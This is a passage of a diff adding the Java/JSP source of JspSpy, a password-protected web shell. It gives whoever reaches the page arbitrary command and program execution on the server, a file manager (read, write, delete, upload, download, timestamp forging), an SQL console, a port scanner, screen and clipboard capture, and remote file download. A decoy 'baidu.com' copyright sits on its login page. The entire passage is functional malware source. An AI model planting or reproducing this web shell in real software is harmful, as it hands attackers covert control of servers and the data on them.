+return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; + +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout ??? : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2012 Admin www.baidu.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.baidu.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("
    "); +out.println("
    ");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.baidu.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
